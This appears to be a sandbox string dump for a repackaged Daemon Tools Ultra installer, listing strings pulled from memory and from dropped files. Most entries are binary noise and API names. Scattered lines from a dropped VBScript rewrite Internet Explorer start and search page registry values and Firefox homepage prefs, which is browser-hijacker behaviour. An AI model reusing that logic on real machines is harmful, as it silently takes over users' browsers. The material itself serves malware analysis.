Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

hhjaada`PbQns___sssD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hhjdVbdPPPOOOM\]]]_G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hhlhahd`amps

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hhlhhhhfhafah`afhmp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HhzF3aK Nc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hI1T+QwAPM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Hidden

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HideFileExt

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HideFolderVerbs

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HideIcons

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HideInWebView

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HideOnDesktopPerUser

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HIGHLIGHT_RIBBON_LIST_ITEM

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Hilight

Unicode based on Dropped File (JSSys3.dll.204366558)

HilightText

Unicode based on Dropped File (JSSys3.dll.204366558)

HiRu.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HJ[["p,7R]y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HKCU{Software{Classes

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

HKR,,DeviceCharacteristics,0x10001,0x0100 ; Use same security checks on relative opens

Ansi based on Dropped File (SET4F37.tmp)

HKR,,Security,,"D:P(A;;GA;;;SY)(A;;GA;;;BA)" ; Allow generic-all access to Local system and Built-in administrators

Ansi based on Dropped File (SET4F37.tmp)

HLL~g8L=5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hLl~p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hMJLIngpp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hN$!5t'S1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Hotkey

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Hoy3&&R$}V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HPp0dg%"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HT/bimN1v

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HTE*7NqZ-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hvValueWW

Ansi based on Dropped File (JSSys3.dll.204366558)

hV|[@g)1mM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Hx_SEmHT#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hyO!k>Rw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hz[%s/."

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hZY#wIM)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h{bSkWpae

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I"DDGp=0)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

i#z-/fP0zY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

i'^K:x+A:eit

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I'zZv lS2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I,v`Xbv4b

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I-n0S@@`U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I8Pdc{j\B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I;!$8"J}|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I>^09E%;0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I?dDJZP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I^^^^^^^^^^^^^^^^^^^^^

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

I`7a{n)KOfJw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

I`YSn@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

IC>k__BackingField

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

icalDevice

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

IconsOnly

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

IDSAsyncDiscoverTargetsResultHandler

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSAsyncReportLunsResultHandler

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSAsyncResultHandler

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSBusService

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSDeviceManager

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSDeviceManagerEvents

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSiSCSIDiscoveryTargets

Unicode based on Runtime Data (DiscSoftBusService.exe )

IDSiSCSITargetLuns

Unicode based on Runtime Data (DiscSoftBusService.exe )

iE#5WO=Y4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

iecheck = 1

Ansi based on Dropped File (start72urez3kr.vbs)

ient.Utils.ListViewLayoutManager.ListViewLayoutManager

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

if lcase(gWShell.Environment("SYSTEM")("Processor_Architecture")) = "amd64" Then

Ansi based on Dropped File (start72urez3kr.vbs)

If Not boolFound Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objFSO.FileExists(strPrefsPath) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objFSO.FileExists(strProfilesFileName) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objINIEdit.GetIniVal(strProfilesFileName, strSection, "Default") = "1" Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objINIEdit.WriteIniVal(strPrefsPath, "User Prefs", "Home URL", strHomePage) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objRegExp_HomePage.Test(strContent) Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.GetStringValue(HKEY_LOCAL_MACHINE, "SOFTWARE\Mozilla\Mozilla Firefox", "CurrentVersion", strCurrentVersion) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Search Page", strSearch) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

If objSWbemObjectEx.SetStringValue(HKEY_CURRENT_USER, "SOFTWARE\Microsoft\Internet Explorer\Main", "Start Page", strHomePage) = 0 Then

Ansi based on Dropped File (start72urez3kr.vbs)

IHDR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ih{WX1pI*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IIIIAIIJIyy|~~|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IK'BB2=P9"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

iles>b__19

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Im4TI4ez

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Image Path

Unicode based on Runtime Data (dtinst.exe )

ImageList_AddMasked

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ImageList_Create

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ImageList_Destroy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

In'w?>Ms3aE1r

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

InactiveTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

InactiveTitleBar

Unicode based on Dropped File (JSSys3.dll.204366558)

InactiveTitleBar2

Unicode based on Dropped File (JSSys3.dll.204366558)

InactiveTitleBarText

Unicode based on Dropped File (JSSys3.dll.204366558)

InactiveTitleText

Unicode based on Dropped File (JSSys3.dll.204366558)

InfoTip

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

INGSHORTCUT

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

INIEdit

Ansi based on Dropped File (JSSys3.dll.204366558)

InitFolderHandler

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

InitializeCriticalSection

Ansi based on Dropped File (imgengine.dll.62529018)

InitializeCriticalSectionAndSpinCount

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

InitializeCriticalSectionEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

InitializeSecurityDescriptor

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

InitiateShutdownW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

InitiatorGuid

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

InprocServer32

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

InterlockedDecrement

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

InterlockedIncrement

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

InternalName

Unicode based on Dropped File (imgengine.dll.62529018)

IntranetName

Unicode based on Runtime Data (DiscSoftBusService.exe )

invalid stoul argument

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

invalid string position

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

InvalidateRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IOct(Vite

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ions Component

Unicode based on Dropped File (JSSys3.dll.204366558)

iqn.2006-01.com.disc-soft:daemon-tools:%ws-%ws

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_co.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_pdu.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ISC\iscsi_task.c

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

IsDebuggerPresent

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

IsDialogMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

IsIconic

Ansi based on Dropped File (JSSys3.dll.204366558)

IsNTFS

Ansi based on Dropped File (JSSys3.dll.204366558)

IsOSVista

Ansi based on Dropped File (JSSys3.dll.204366558)

IsProcessorFeaturePresent

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

IsShortcut

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

isualStyle#

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

IsValidCodePage

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

IsValidLocaleName

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

IsWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

IsWindowEnabled

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IsWindowVisible

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IsWow64Process

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

it1h)$C\c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

it20W

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

iu_`1LNUrk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

IvaQCt:sPZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

iwvHexCode

Ansi based on Dropped File (JSSys3.dll.204366558)

iXUJhH\Xo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J!QUG]\UG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j"qkn%63]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j*'2,;KKC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J+h=8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j-B:gwUVc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j/@_6?YV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j0[~) |[#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j17mZM4]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j5,x8~v}s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j5/ge

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j7b4u>j=?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J<VrcdlR4e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j=nzgeYx0m/s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j^8TBsE0f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J^l a8i M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J_[=&VKic

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

j_U}54J|Sa

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

J`6&"Z=zR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jA>>jq6*A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

January

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

jaoXPP\POQOL]_Z_s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jbooPe^ns

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

JbT*ag}K

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jC m(rH!F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jddXPPVMKMKKK6---7Z1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jddXPPWPOMMKKY]]]r

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jd{FatlRV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jf+niq0-]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jG4G>_WH)0O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jgS+gh[`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jidbbIIhR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jj/{Fz7\R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jjjVVVSMMMK666-----,,,6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jjlmg^W:34;X_jrsmegi

Ansi based on Dropped File (Uninstall.exe.212096218)

JLA$f;OyQ:f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jlccb@Pz%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jln:<4Tl~qj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jluhdta'6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jp[Sqs:JQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jpq\TNQD<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

JRLNh~Ki`(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jS^ Dsp/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

JSSys3

Ansi based on Dropped File (JSSys3.dll.204366558)

JSSys3.dll

Ansi based on Dropped File (JSSys3.dll.204366558)

JSSys3WW

Ansi based on Dropped File (JSSys3.dll.204366558)

JU5>y02eS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jyb?]0eH'&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Jyg":>;}O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

jYH@6`VCq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k&T//g-uH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K&yiMp.!L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k(A+[D{fd[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k20a/NVq_s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k2ye[?O ^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K85*%xOpW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k8In/[Q0%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k<,nWg`[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K[='c]pI(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k[ydT p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

k\LY7s;<4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Kcn}p.pW!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ke]d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kEdoJx5L/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

KERNEL32

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kernel32

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kernel32.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

KERNEL32.DLL

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

kfI@e#ToH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kHd=Vk&!7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

khjhhah``bPcsspnssss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

KillTimer

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

kjKvqT+QLgU}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kklhhhhaah``o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

KNHFE=;=>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

knKHHFE=E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

KnownDllList

Unicode based on Runtime Data (HiRu.exe )

kodKL?F?M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

KPcs,oN"Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Kr[Re^K"mK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Kt"SF.G,s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kX@}7@ ^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

kzaJFuk3_?v

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

K}C9Z=L=W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

L%^rm/Lf,Rg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l*`if{c3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

L.7+f2vz3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l.?E(:lXn

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l/VcJ)9Fq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l3%NcyFSM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l32.dll

Unicode based on Dropped File (JSSys3.dll.204366558)

l:ow@$m?Xi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

L^tDJ;Vr2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l_f\7?\JD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

L_Mzwhq}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

l`xUv%sa

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lahqaaj`ajip

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Language

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Language Hotkey

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LanguageList

Unicode based on Runtime Data (dtinst.exe )

Layout Hotkey

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

LCMapStringEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

LCMapStringW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

LdapClientIntegrity

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

lddFB@F@H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ldFFF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LdHS5J"UUv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

LeaveCriticalSection

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

lection

Unicode based on Dropped File (JSSys3.dll.204366558)

LegalCopyright

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

les(*.*)

Unicode based on Dropped File (JSSys3.dll.204366558)

leVersion

Unicode based on Dropped File (imgengine.dll.62529018)

LF6w0wd`n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lfDFDFDDDFDEhRP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

lfefDHHed

